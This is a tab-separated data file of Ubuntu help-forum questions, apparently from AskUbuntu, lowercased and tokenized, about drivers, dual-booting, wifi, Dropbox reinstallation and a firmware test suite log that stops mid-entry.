361738	nvidia 3d vision kit enabling	i 've recently installed ubuntu 12.04 lts and successfully installed the nvidia driver for my gtx 550ti gpu ... my question is , how do i enable the 3d vision since my monitor is 3d capable and i 'm always using it for gaming ... thanks for the responses .
361739	youtube webapp crashed after upgrade to 13.10	i have annoying issue with youtube webapp , which i installed in 13.04 . in 13.10 i noticed it do n't work , so i remove the package with software center ( unity-webapps-youtube ) , but the icon is still on list in the dash , and when i click the sound button , youtube is still there . youtube is still launching when i press those buttons . even after few reboots , and reinstalling this webapp problem remains . any solution ?
361741	what are dependencies ?	sometimes , when installing things , dependencies are missing ... but what are they ?
361742	recommended setup dualboot efi	let me firstly update you on my current situation : hdd 1 : solid state drive ( gpt ) with windows 8.1 in efi setup ( no secure boot , has efi partition ) hdd 2 : regular hard disk ( mbr ) with ubuntu 13.04 alongside a documents partition in ntfs . now it used to be like this ever since i reinstalled windows in efi . in legacy mode ubuntu booted fine ( when i override boot to my hdd 2 in bios ) , although according to the ubuntu tutorials it 's not exactly recommended to have two boot methods . i want to install 13.10 as clean as possible , and i can now decide to change setup . what can you suggest i 'd do ? i know it worked fine in 'hybrid ' ( legacy + efi ) and efi is the way to go , but i want everything to be coherent and streamlined .
361745	how to turn off thumbnails for text files	the preferences menu in nautilus has an option to turn on or turn off thumbnails . but this option turns off thumbnail generation for all file types . i want to turn off thumbnail generation only for text files . previous versions of ubuntu had that option . how do i do this in ubuntu 13.10 ?
361752	not video player works at all xubuntu 13.10	no of the video player work , vlc , smplayer , parole etc . etc . i sometimes get an error , but mostly i get a screen with weird colors and a couple of weird sounds . any help or suggestions ?
361753	where could i found a simple view of ubuntu 's architecture ?	using ubuntu and askubuntu , i see all these key words : linux kernel ( header ) gnome , grub , grub 2 , xorg , unity , compiz , metacity , ... could i get a view about those components ( and probably other main components ) to understand how they are linked together ( with a small definition of their purpose ) ?
361758	ubuntu 13.10 installed totally lost	i installed ubuntu 11.04 to a laptop a couple of years ago and everything seemed to `` work out of the box '' including wifi and worked great for what i required . but because everything worked so easily i have not really learnt to much of how linux based os work . having now decided to install ubuntu 13.10 to a desktop pc i use for work ( after giving up on windows due to incessant virus attacks ! ) i was faced with having to wipe windows due to another unrecoverable virus before installing ubuntu through a bootable flash drive but without internet connection . ubuntu installed fine but there is no wireless connection available which i 'm assuming the relevant drivers were n't installed ? so if anyone can please give advice how to install drivers from a flash drive to get wifi working i would really grateful ! thanks in advance to any responses !
361759	enabling nvidia card asus n550	i am in the process of trying to get wine sorted so that i can play eve , terraria and all that jazz . however i am having a problem , well at least i think i am having a problem . eve runs fine in windows with both the intel chip and the gt745 , the intel chip however runs slow when i enable high shaders and aa . this is to be expected and this leads me to think that my nvidia card is not being used when i try to run it through wine . if i go to the eve settings , under the display adapter it lists my intel card and not my nvidia one , however it also does this on windows ... no idea why , probably ccp just derping . anyway , what i basically want to do is just use my nvidia card all the time in ubuntu , i really do not care about battery life since 90 % of the time i have the charger with me and a plug is near by lol . here is some info , i also have bumblebee installed : $ lspci -v 04:00.0 3d controller : nvidia corporation gk107m [ geforce gt 745m ] ( rev a1 ) subsystem : asustek computer inc. device 12dd flags : bus master , fast devsel , latency 0 , irq 11 memory at f6000000 ( 32-bit , non-prefetchable ) [ size=16m ] memory at e0000000 ( 64-bit , prefetchable ) [ size=256m ] memory at f0000000 ( 64-bit , prefetchable ) [ size=32m ] i/o ports at d000 [ size=128 ] expansion rom at f7000000 [ disabled ] [ size=512k ] capabilities : < access denied > $ lspci | egrep 'vga|3d' 00:02.0 vga compatible controller : intel corporation haswell-ult integrated graphics controller ( rev 09 ) 04:00.0 3d controller : nvidia corporation gk107m [ geforce gt 745m ] ( rev a1 ) if i try to run this command $ optirun chrome i get the following : [ 1042.018375 ] [ error ] can not access secondary gpu - error : [ xorg ] ( ee ) nvidia ( 0 ) : failed to initialize the nvidia gpu at pci:4:0:0 . please [ 1042.018413 ] [ error ] aborting because fallback start is disabled . i have configured the conf file to point to the bus 04:0:0 as stated on the wiki . help would be great : d
361760	xubuntu problems on 13.10	in order to increase the speed of working on my netbook , i recently switched over to xubuntu using the command : sudo apt-get install xubuntu-desktop here are the issues which i see : there is no sound icon or the sound icon is dimmed . how do i increase or decrease the volume ? how do i remove the unity desktop or how do i prevent lightdm from loading ? is there anything such as xdm ? i do not see the battery monitor app on the xubuntu desktop . how do i add that ?
361765	lenovo e135 : ca n't resume after lid close	i hoped so much 13.10 would address this issue , but it did n't . i have a lenovo e135 and run 13.10 now ( everything happened in 13.4 as well ) the problem : i close the lid of my laptop and it successfully goes into suspend . when i open the lip , i can hear the laptop returning from suspend but the screen does not come on . from here on , no matter what i do , the laptop no longer responds . tried starting terminal via keyboard and restart or halt - does n't work . touchpad touches do n't do anything and neither do any keys . only thing left to do is hard-reboot via powerbutton . what i already did to try to fix this : did a lot of searching the web to no avail tried the 3 different video drivers each ( x.org , fglrx , fglrx-updates ) - > no change each tried gnome-sehll instead of unity - > no change i even tried using a different distro ( mint 15 ) - > no change a have no clue what else to do or try . it really sucks to not have the feature of just closing your laptop . i have to shut it down every time . can anyone help me ? or at least point me in the right direction ? thanks for reading !
361770	unable to access sd card on nexus 4 after re-installing android	after installing ubuntu on my nexus 4 and then re-installing android ( cyanogen mode 10.1.2 ) i am no longer able to see or use my sd card . a window flashes every time i do anything on the phone but it is so quick i am unable to read what it says .
361771	terminal closes at once when started	when i am using the shortcut ctrl+alt+t or starting the terminal app from the menu , terminal appears for a second and suddenly closes . i have to work with xterm for now . i know this behaviour was made by my misconfiguration . how can i restore my terminal to its initial state ?
361772	only 1080p youtube videos work properly	i have ubuntu 12.04 64bit installed/full updated and have noticed that i can only play 1080p youtube videos properly on full screen . all other resolutions , 480 , 720 , 1440 etc do not go into full screen properly . please have a look at the attached images . you will notice that only the 1080p video has the video control bar right at the bottom with a respectable text size . all other videos do n't have the video control bar right at the bottom on the screen , and the control bar text is too small . i 've had this problem for ages , but finally decided to ask about it . 480p : notice the bottom control bar , it 's not at the bottom on the screen and the video has borders on the sides : 720p : notice the bottom control bar , it 's not at the bottom on the screen and the video has borders on the sides and the text is tiny : 1080p : this is the only one that works as expected , i.e . controls right at the bottom , and good font size and no borders on the sides : 1440p : notice the bottom control bar , it 's not at the bottom on the screen and the video has borders on the sides : how do i correct this problem so i can play all different video resolutions at full screen . the flash version i have installed in chromium is adobe flash player - version : 11.2 r202 - shockwave flash 11.2 r202
361773	auto-mount hard drive -gui	one of my start up application uses a 2nd hard drive . when i start my computer it always says that the files have gone missing , when in reality they hard drive is just not mounted . the mount point is /media/stuff i am new to ubuntu . i am not well knowledge with bash and the terminal . are there any gui applications that i can download form the software center or some other place that will allow me to easily set-up auto-mount . i see that others have asked this question but my case is different because the 2nd drive is also ext4 the hdd is 2tb and is aplit up like this : 1tb windows 8 ( nfts ) 1tb ubuntu ( ex4 ) |mount point should be /media/stuff
361777	dropbox re-installation	i first installed dropbox with the following commands : sudo apt-key adv -- keyserver pgp.mit.edu -- recv-keys 5044912e sudo add-apt-repository `` deb http : //linux.dropbox.com/ubuntu precise main '' sudo apt-get update & & sudo apt-get install nautilus-dropbox i could n't figure out how to autostart dropbox , so i decided to remove it with the following and to reinstall it from the software centre : sudo apt-get remove nautilus-dropbox rm -rf ~/.dropbox rm -rf ~/.dropbox-dist when i tried to install again in ubuntu software centre , it returns me an error message : **package dependencies can not be resolved** this error could be caused by required additional software packages which are missing or not installable . furthermore there could be a conflict between software packages which are not allowed to be installed at the same time . detail : the following packages have unmet dependencies : nautilus-dropbox : any help ? ? ?
361778	problem with installing ubuntu in hp mini 100e	i want to install ubuntu in hp mini 100e . i have no usb disk . the notepad has no external cd/dvd writer . help out !
361779	ubuntu asks to upgrade from 13.04 to 13.10 every 5 mins , how to stop that ?	i 've clicked do n't upgrade , i 've clicked any possible button , but i still get that annoying modal box asking me to upgrade . how do i stop it ?
361780	ubuntu 12.04lts becoms slow and jerky randomly for a mintue and then becomes normal by itself	i am using ubuntu 12.04lts on my toshiba satellite l510 and i have only ubuntu installed . the system becomes slow and jerky by itself after every 10minutes or so and the remains like that for less than a minute . then becomes normal by itself . when the systems becomes slow ; mouse movement becomes jerky , on right click the menu loads super slow , the windows minimize very slowly . the major problem is the mouse becoming jerky . can someone please suggest anything which can solve this problem ? thanks in advance !
361781	could autorun virus , affect my pc via wine ?	i have installed wine and i am afraid that viruses will affect my pc now . i will not open any other .exe file other than mine one ( which i use everyday )
361790	how to enable extra typographic characters in ubuntu 13.10 ?	it was easy to do in ubuntu 13.04 , but i ca n't understand how to do it in 13.10 . how to enable extra typographic characters in ubuntu 13.10 ?
361791	no wireless ubuntu13.10	installed ubuntu 13.10 yesterday no internet connection.12.10 ok and dongle ok,13.4 no dongle , nothing now . compac mini 110c , broadcom 4313 ( ar8132 q.atheros . ) only have ubuntu on notebook .
361802	ubuntu 12.04 for toshiba satellite l650d-13u - will it work ?	i am using a toshiba satellite l560d-13u that was purchased in q4 2010 . i have recently installed ubuntu 12.04 and was wondering if ububtu would support all of its hardware or whether i would have to run about and find drivers for it . here is a link to my laptops specification : http : //www.toshiba.co.uk/discontinued-products/satellite-l650d-13u/ help me out please guys , it 's been years since i last used ubuntu and really want to get into it again ! thanks in advance !
361806	what happens if we install two boot images in a pendrive ?	i have a ubuntu 12.04 image in my 16 gb moserbaer pendrive . i am willing to install another image in it with out losing this 12.04. i 'm using universal usb installer 1.9.4.3 . thank you .
361807	after 8.1 lost grub . can i just uninstall linux ?	i dual booted ubuntu alongside my windows 8 . after installing windows 8.1 i lost grub and it boots straight into 8.1 and i have a watermark that says `` secureboot is n't configured correctly '' . but i 've been wanting to uninstall linux for a while to reclaim memory for my steam games on windows , the only thing that keeps holding me back is the thought of dealing with grub . but since windows 8.1 knocked it out , what would happen if i just deleted my linux partitions and reallocated that memory ? and what 's the watermark all about ?
361809	can anybody help me resolve these fwts issues ?	see the list below . i have no clue where to start ... i ran firmware testsuitelive ( usb ) . some tests failed , which might explain the issues i 'm having with my machine ( constant reboot after shutdown or suspend , i assume these are acpi issues ) . i have the latest bios on my system . many thanks in advance for helping sort those out ! results generated by fwts : version v0.26.03 ( thu dec 20 16:46:56 cst 2012 ) . some of this work - copyright ( c ) 1999 - 2010 , intel corp. all rights reserved . some of this work - copyright ( c ) 2010 - 2012 , canonical . this test run on 12/10/13 at 09:33:10 on host linux ubuntu 3.5.0-22-generic # 34-ubuntu smp sat jan 12 05:02:01 utc 2013 x86_64 . running tests : version bios_info oops mtrr acpiinfo klog csm microcode msr nx cpufreq maxfreq virt maxreadreq crs aspm hpet_check dmi_decode smbios pnp pciirq mpcheck os2gap hda_audio bios32 ebda pcc wmi osilinux apicedge method mcfg fan fadt dmar cstates checksum apicinstance acpitables syntaxcheck wakealarm . gather kernel system information . -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- test 1 of 3 : gather kernel signature . signature : ubuntu 3.5.0-22.34-generic 3.5.7.2 test 2 of 3 : gather kernel system information . kernel version : linux version 3.5.0-22-generic ( buildd @ chindi05 ) ( gcc version 4.6.1 ( ubuntu/linaro 4.6.1-9ubuntu3 ) ) # 34-ubuntu smp sat jan 12 05:02:01 utc 2013 test 3 of 3 : gather apci driver version . acpi version : 20120320 ==================================================================================================== 0 passed , 0 failed , 0 warnings , 0 aborted , 0 skipped , 3 info only . ==================================================================================================== gather bios dmi information . -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- test 1 of 1 : gather bios dmi information bios vendor : american megatrends inc. bios version : p1.80 bios release date : 07/12/2013 board name : b75 pro3-m board serial # : board version : board asset tag : chassis serial # : to be filled by o.e.m . chassis type : 3 chassis vendor : to be filled by o.e.m . chassis version : to be filled by o.e.m . chassic asset tag : to be filled by o.e.m . product name : to be filled by o.e.m . product serial # : to be filled by o.e.m . product uuid : 00020003-0004-0005-0006-000700080009 product version : to be filled by o.e.m . system vendor : to be filled by o.e.m . ==================================================================================================== 0 passed , 0 failed , 0 warnings , 0 aborted , 0 skipped , 1 info only . ==================================================================================================== mtrr validation . -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- mtrr overview -- -- -- -- -- -- - reg 0 : 0x0000000000000000 - 0x0000000400000000 ( 16384 mb ) write-back reg 1 : 0x0000000400000000 - 0x0000000420000000 ( 512 mb ) write-back reg 2 : 0x00000000e0000000 - 0x0000000100000000 ( 512 mb ) uncached reg 3 : 0x00000000d0000000 - 0x00000000e0000000 ( 256 mb ) uncached reg 4 : 0x00000000cf800000 - 0x00000000d0000000 ( 8 mb ) uncached reg 5 : 0x000000041f000000 - 0x0000000420000000 ( 16 mb ) uncached reg 6 : 0x000000041e800000 - 0x000000041f000000 ( 8 mb ) uncached reg 7 : 0x000000041e600000 - 0x000000041e800000 ( 2 mb ) uncached test 1 of 3 : validate the kernel mtrr iomem setup . failed [ medium ] mtrrincorrectattr : test 1 , memory range 0xe0000000 to 0xefffffff ( 0000:00:02.0 ) has incorrect attribute uncached write-back . failed [ medium ] mtrrincorrectattr : test 1 , memory range 0xf0000000 to 0xf0003fff ( 0000:03:00.0 ) has incorrect attribute uncached write-back . failed [ medium ] mtrrincorrectattr : test 1 , memory range 0xf0004000 to 0xf0004fff ( 0000:03:00.0 ) has incorrect attribute uncached write-back . failed [ medium ] mtrrincorrectattr : test 1 , memory range 0xf7800000 to 0xf7bfffff ( 0000:00:02.0 ) has incorrect attribute write-back . failed [ medium ] mtrrincorrectattr : test 1 , memory range 0xf7c00000 to 0xf7c1ffff ( 0000:04:02.0 ) has incorrect attribute write-back . failed [ medium ] mtrrincorrectattr : test 1 , memory range 0xf7c20000 to 0xf7c200ff ( 0000:04:02.0 ) has incorrect attribute write-back . failed [ medium ] mtrrincorrectattr : test 1 , memory range 0xf7d00000 to 0xf7d001ff ( 0000:02:00.0 ) has incorrect attribute write-back . failed [ medium ] mtrrincorrectattr : test 1 , memory range 0xf7e00000 to 0xf7e0ffff ( 0000:00:14.0 ) has incorrect attribute write-back . failed [ medium ] mtrrincorrectattr : test 1 , memory range 0xf7e10000 to 0xf7e13fff ( 0000:00:1b.0 ) has incorrect attribute write-back . failed [ medium ] mtrrincorrectattr : test 1 , memory range 0xf7e15000 to 0xf7e150ff ( 0000:00:1f.3 ) has incorrect attribute write-back . failed [ medium ] mtrrincorrectattr : test 1 , memory range 0xf7e16000 to 0xf7e167ff ( 0000:00:1f.2 ) has incorrect attribute write-back . failed [ medium ] mtrrincorrectattr : test 1 , memory range 0xf7e17000 to 0xf7e173ff ( 0000:00:1d.0 ) has incorrect attribute write-back . failed [ medium ] mtrrincorrectattr : test 1 , memory range 0xf7e18000 to 0xf7e183ff ( 0000:00:1a.0 ) has incorrect attribute write-back . failed [ medium ] mtrrincorrectattr : test 1 , memory range 0xf7e1b000 to 0xf7e1b00f ( 0000:00:16.0 ) has incorrect attribute write-back . test 2 of 3 : validate the mtrr setup across all processors . passed : test 2 , all processors have the a consistent mtrr setup . test 3 of 3 : check for amd mtrrfixdrammoden being cleared by the bios . skipped : test 3 , cpu is not an amd , can not test . ==================================================================================================== 1 passed , 14 failed , 0 warnings , 0 aborted , 1 skipped , 0 info only . ==================================================================================================== general acpi information check . -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- test 1 of 3 : determine kernel acpi version . kernel acpica driver version : 20120320 , supports acpi 5.0 test 2 of 3 : determine machines acpi version . facp acpi version : 2.0 test 3 of 3 : determine aml compiler . determine the compiler used to generate the acpi aml in the dsdt and ssdt . table dsdt , oem alaska , created with intl ( intel ) compiler . table ssdt0 , oem intel_ , created with intl ( intel ) compiler . table ssdt1 , oem satare , created with intl ( intel ) compiler . table ssdt2 , oem pmref , created with intl ( intel ) compiler . table ssdt3 , oem pmref , created with intl ( intel ) compiler . ==================================================================================================== 0 passed , 0 failed , 0 warnings , 0 aborted , 0 skipped , 3 info only . ==================================================================================================== scan kernel log for errors and warnings . -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- test 1 of 1 : kernel log error check . kernel message : [ 0.067371 ] energy_perf_bias : set to 'normal ' , was 'performance' advice : this is not exactly a failure but a warning from the kernel . the msr_ia32_energy_perf_bias was initialized and defaulted to a high performance bias setting . the kernel has detected this and changed it down to a 'normal ' bias setting . failed [ high ] klogacpibadamlcode : test 1 , high kernel message : [ 9.138069 ] acpi warning : 0x0000000000000460-0x000000000000047f systemio conflicts with region \pmio 1 ( 20120320 /utaddress-251 ) advice : acpi aml intepreter has found some non-conforming aml code . this should be investigated and fixed . failed [ high ] klogacpibadamlcode : test 1 , high kernel message : [ 9.138078 ] acpi warning : 0x0000000000000428-0x000000000000042f systemio conflicts with region \pmio 1 ( 20120320 /utaddress-251 ) advice : acpi aml intepreter has found some non-conforming aml code . this should be investigated and fixed . failed [ high ] klogacpibadamlcode : test 1 , high kernel message : [ 9.138083 ] acpi warning : 0x0000000000000500-0x000000000000053f systemio conflicts with region \gpr2 1 ( 20120320 /utaddress-251 ) advice : acpi aml intepreter has found some non-conforming aml code . this should be investigated and fixed . failed [ high ] klogacpibadamlcode : test 1 , high kernel message : [ 9.138085 ] acpi warning : 0x0000000000000500-0x000000000000053f systemio conflicts with region \gpio 2 ( 20120320 /utaddress-251 ) advice : acpi aml intepreter has found some non-conforming aml code . this should be investigated and fixed . found 4 unique errors in kernel log . ==================================================================================================== 0 passed , 4 failed , 0 warnings , 0 aborted , 0 skipped , 0 info only . ==================================================================================================== check if system is using latest microcode . -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- can not read microcode file /usr/share/misc/intel-microcode.dat . aborted test , initialisation failed . ==================================================================================================== 0 passed , 0 failed , 0 warnings , 1 aborted , 0 skipped , 0 info only . ==================================================================================================== cpu frequency scaling tests ( takes ~1-2 mins ) . -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- test 1 of 1 : cpu p-state checks . for each processor in the system , this test steps through the various frequency states ( p-states ) that the bios advertises for the processor . for each processor/frequency combination , a quick performance value is measured . the test then validates that : 1 ) each processor has the same number of frequency states 2 ) higher advertised frequencies have a higher performance 3 ) no duplicate frequency values are reported by the bios 4 ) is bios wrongly doing sw_all p-state coordination across cores 5 ) is bios wrongly doing sw_any p-state coordination across cores cpu 0 : 14 cpu frequency steps supported . frequency | relative speed | bogo loops -- -- -- -- -- -+ -- -- -- -- -- -- -- -- + -- -- -- -- -- - 2.95 ghz | 100.0 % | 204373 2.85 ghz | 96.6 % | 197330 2.75 ghz | 93.1 % | 190280 2.65 ghz | 89.7 % | 183233 2.55 ghz | 86.2 % | 176181 2.45 ghz | 82.8 % | 169132 2.35 ghz | 79.3 % | 162082 2.25 ghz | 75.9 % | 155035 2.15 ghz | 72.4 % | 147988 2.05 ghz | 69.0 % | 140941 1.95 ghz | 65.5 % | 133890 1.85 ghz | 62.1 % | 126847 1.75 ghz | 58.6 % | 119799 1.65 ghz | 55.2 % | 112749 cpu 1 : 14 cpu frequency steps supported . frequency | relative speed | bogo loops -- -- -- -- -- -+ -- -- -- -- -- -- -- -- + -- -- -- -- -- - 2.95 ghz | 100.0 % | 204374 2.85 ghz | 96.6 % | 197326 2.75 ghz | 93.1 % | 190275 2.65 ghz | 89.7 % | 183227 2.55 ghz | 86.2 % | 176175 2.45 ghz | 82.8 % | 169123 2.35 ghz | 83.8 % | 171200 2.25 ghz | 75.9 % | 155028 2.15 ghz | 72.4 % | 147983 2.05 ghz | 69.0 % | 140934 1.95 ghz | 65.5 % | 133863 1.85 ghz | 62.1 % | 126841 1.75 ghz | 58.6 % | 119792 1.65 ghz | 55.2 % | 112744 failed [ medium ] cpufreqsloweroncpu : test 1 , supposedly higher frequency 2.45 ghz is slower ( 169123 bogo loops ) than frequency 2.45 ghz ( 171200 bogo loops ) on cpu 1 . passed : test 1 , p-state coordination done by hardware . ==================================================================================================== 1 passed , 1 failed , 0 warnings , 0 aborted , 0 skipped , 0 info only . ==================================================================================================== checks firmware has set pci express maxreadreq to a higher value on non-motherboard devices . -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- test 1 of 1 : check firmware settings maxreadreq for pci express devices . maxreadreq for pci : //00:00:1b.0 audio device : intel corporation panther point high definition audio controller ( rev 04 ) is low ( 128 ) [ audio device ] . failed [ low ] lowmaxreadreq : test 1 , 1 devices have low maxreadreq settings . firmware may have configured these too low . advice : the maxreadrequest size is set too low and will affect performance . it will provide excellent bus sharing at the cost of bus data transfer rates . although not a critical issue , it may be worth considering setting the maxreadrequest size to 256 or 512 to increase throughput on the pci express bus . some drivers ( for example the brocade fibre channel driver ) allow one to override the firmware settings . where possible , this bios configuration setting is worth increasing it a little more for better performance at a small reduction of bus sharing . ==================================================================================================== 0 passed , 1 failed , 0 warnings , 0 aborted , 0 skipped , 0 info only . ==================================================================================================== pcie aspm check . -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- test 1 of 2 : pcie aspm acpi test . pcie aspm is not controlled by linux kernel . advice : bios reports that linux kernel should not modify aspm settings that bios configured . it can be intentional because hardware vendors identified some capability bugs between the motherboard and the add-on cards . test 2 of 2 : pcie aspm registers test . warning : test 2 , rp 00h:1ch.04h l0s not enabled . warning : test 2 , rp 00h:1ch.04h l1 not enabled . warning : test 2 , device 02h:00h.00h l0s not enabled . advice : the aspm l0s low power link state is optimized for short entry and exit latencies , while providing substantial power savings . disabling l0s of a pcie device may increases power consumption , and will impact the battery life of a mobile system . advice : the aspm l1 low power link state is optimized for maximum power savings with longer entry and exit latencies . disabling l1 of a pcie device may increases power consumption , and will impact the battery life of a mobile system significantly . passed : test 2 , pcie aspm setting matched was matched . warning : test 2 , rp 00h:1ch.05h l0s not enabled . warning : test 2 , rp 00h:1ch.05h l1 not enabled . warning : test 2 , device 03h:00h.00h l0s not enabled . warning : test 2 , device 03h:00h.00h l1 not enabled . advice : the aspm l0s low power link state is optimized for short entry and exit latencies , while providing substantial power savings . disabling l0s of a pcie device may increases power consumption , and will impact the battery life of a mobile system . advice : the aspm l1 low power link state is optimized for maximum power savings with longer entry and exit latencies . disabling l1 of a pcie device may increases power consumption , and will impact the battery life of a mobile system significantly . passed : test 2 , pcie aspm setting matched was matched . passed : test 2 , pcie aspm setting matched was matched . ==================================================================================================== 3 passed , 0 failed , 7 warnings , 0 aborted , 0 skipped , 0 info only . ==================================================================================================== test dmi/smbios tables for errors . -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- test 1 of 1 : test dmi/smbios tables for errors . passed : test 1 , entry @ 0x000ee880 'bios information ( type 0 ) ' failed [ medium ] dmibaddefault : test 1 , string index 0x01 in table entry 'system information ( type 1 ) ' @ 0x000ee8c3 , field 'manufacturer ' , offset 0x04 has a default value 'to be filled by o.e.m . ' and probably has not been updated by the bios vendor . advice : the dmi table contains data which is clearly been left in a default setting and not been configured for this machine . somebody has probably forgotten to define this field and it basically means this field is effectively useless . note that the kernel uses this field so it probably should be corrected to ensure the kernel is using sane values . failed [ medium ] dmibaddefault : test 1 , string index 0x02 in table entry 'system information ( type 1 ) ' @ 0x000ee8c3 , field 'product name ' , offset 0x05 has a default value 'to be filled by o.e.m . ' and probably has not been updated by the bios vendor . advice : the dmi table contains data which is clearly been left in a default setting and not been configured for this machine . somebody has probably forgotten to define this field and it basically means this field is effectively useless . note that the kernel uses this field so it probably should be corrected to ensure the kernel is using sane values . failed [ medium ] dmibaddefault : test 1 , string index 0x03 in table entry 'system information ( type 1 ) ' @ 0x000ee8c3 , field 'version ' , offset 0x06 has a default value 'to be filled by o.e.m . ' and probably has not been updated by the bios vendor . advice : the dmi table contains data which is clearly been left in a default setting and not been configured for this machine . somebody has probably forgotten to define this field and it basically means this field is effectively useless . note that the kernel uses this field so it probably should be corrected to ensure the kernel is using sane values . failed [ medium ] dmibaddefault : test 1 , string index 0x04 in table entry 'system information ( type 1 ) ' @ 0x000ee8c3 , field 'serial number ' , offset 0x07 has a default value 'to be filled by o.e.m . ' and probably has not been updated by the bios vendor . advice : the dmi table contains data which is clearly been left in a default setting and not been configured for this machine . somebody has probably forgotten to define this field and it basically means this field is effectively useless . note that the kernel uses this field so it probably should be corrected to ensure the kernel is using sane values . failed [ low ] dmibaddefault : test 1 , string index 0x05 in table entry 'system information ( type 1 ) ' @ 0x000ee8c3 , field 'sku number ' , offset 0x19 has a default value 'to be filled by o.e.m . ' and probably has not been updated by the bios vendor . advice : the dmi table contains data which is clearly been left in a default setting and not been configured for this machine . somebody has probably forgotten to define this field and it basically means this field is effectively useless , however the kernel does not use this data so the issue is fairly low . failed [ low ] dmibaddefault : test 1 , string index 0x06 in table entry 'system information ( type 1 ) ' @ 0x000ee8c3 , field 'family ' , offset 0x1a has a default value 'to be filled by o.e.m . ' and probably has not been updated by the bios vendor . advice : the dmi table contains data which is clearly been left in a default setting and not been configured for this machine . somebody has probably forgotten to define this field and it basically means this field is effectively useless , however the kernel does not use this data so the issue is fairly low . advice : it may be worth checking against section 7.2 of the system management bios ( smbios ) reference specification . passed : test 1 , entry @ 0x000ee969 'base board information ( type 2 ) ' failed [ medium ] dmibaddefault : test 1 , string index 0x01 in table entry 'chassis information ( type 3 ) ' @ 0x000ee9e7 , field 'manufacturer ' , offset 0x04 has a default value 'to be filled by o.e.m . ' and probably has not been updated by the bios vendor . advice : the dmi table contains data which is clearly been left in a default setting and not been configured for this machine . somebody has probably forgotten to define this field and it basically means this field is effectively useless . note that the kernel uses this field so it probably should be corrected to ensure the kernel is using sane values . failed [ medium ] dmibaddefault : test 1 , string index 0x02 in table entry 'chassis information ( type 3 ) ' @ 0x000ee9e7 , field 'version ' , offset 0x06 has a default value 'to be filled by o.e.m . ' and probably has not been updated by the bios vendor . advice : the dmi table contains data which is clearly been left in a default setting and not been configured for this machine . somebody has probably forgotten to define this field and it basically means this field is effectively useless . note that the kernel uses this field so it probably should be corrected to ensure the kernel is using sane values . failed [ medium ] dmibaddefault : test 1 , string index 0x03 in table entry 'chassis information ( type 3 ) ' @ 0x000ee9e7 , field 'serial number ' , offset 0x07 has a default value 'to be filled by o.e.m . ' and probably has not been updated by the bios vendor . advice : the dmi table contains data which is clearly been left in a default setting and not been configured for this machine . somebody has probably forgotten to define this field and it basically means this field is effectively useless . note that the kernel uses this field so it probably should be corrected to ensure the kernel is using sane values . failed [ medium ] dmibaddefault : test 1 , string index 0x04 in table entry 'chassis information ( type 3 ) ' @ 0x000ee9e7 , field 'asset tag ' , offset 0x08 has a default value 'to be filled by o.e.m . ' and probably has not been updated by the bios vendor . advice : the dmi table contains data which is clearly been left in a default setting and not been configured for this machine . somebody has probably forgotten to define this field and it basically means this field is effectively useless . note that the kernel uses this field so it probably should be corrected to ensure the kernel is using sane values . advice : it may be worth checking against section 7.4 of the system management bios ( smbios ) reference specification . passed : test 1 , entry @ 0x000eea71 'system slot information ( type 9 ) ' passed : test 1 , entry @ 0x000eea88 'system slot information ( type 9 ) ' passed : test 1 , entry @ 0x000eea9f 'system slot information ( type 9 ) ' passed : test 1 , entry @ 0x000eeab7 'system slot information ( type 9 ) ' failed [ medium ] dmibaddefault : test 1 , string index 0x01 in table entry 'oem strings ( type 11 ) ' @ 0x000eeacf , field 'string 1 ' , offset 0x04 has a default value 'to be filled by o.e.m . ' and probably has not been updated by the bios vendor . advice : the dmi table contains data which is clearly been left in a default setting and not been configured for this machine . somebody has probably forgotten to define this field and it basically means this field is effectively useless . note that the kernel uses this field so it probably should be corrected to ensure the kernel is using sane values . advice : it may be worth checking against section 7.12 of the system management bios ( smbios ) reference specification . passed : test 1 , entry @ 0x000eeaec 'system boot information ( type 32 ) ' passed : test 1 , entry @ 0x000eeb02 'cache information ( type 7 ) ' passed : test 1 , entry @ 0x000eeb26 'cache information ( type 7 ) ' passed : test 1 , entry @ 0x000eeb4a 'cache information ( type 7 ) ' passed : test 1 , entry @ 0x000eeb6e 'physical memory array ( type 16 ) ' passed : test 1 , entry @ 0x000eeb87 'processor information ( type 4 ) ' passed : test 1 , entry @ 0x000eec11 'memory device ( type 17 ) ' passed : test 1 , entry @ 0x000eec6d 'memory device ( type 17 ) ' passed : test 1 , entry @ 0x000eecd2 'memory device mapped address ( type 20 ) ' passed : test 1 , entry @ 0x000eecf7 'memory device ( type 17 ) ' passed : test 1 , entry @ 0x000eed53 'memory device ( type 17 ) ' passed : test 1 , entry @ 0x000eedb8 'memory device mapped address ( type 20 ) ' passed : test 1 , entry @ 0x000eeddd 'memory array mapped address ( type 19 ) ' passed : test 1 , entry @ 0x000eedfe 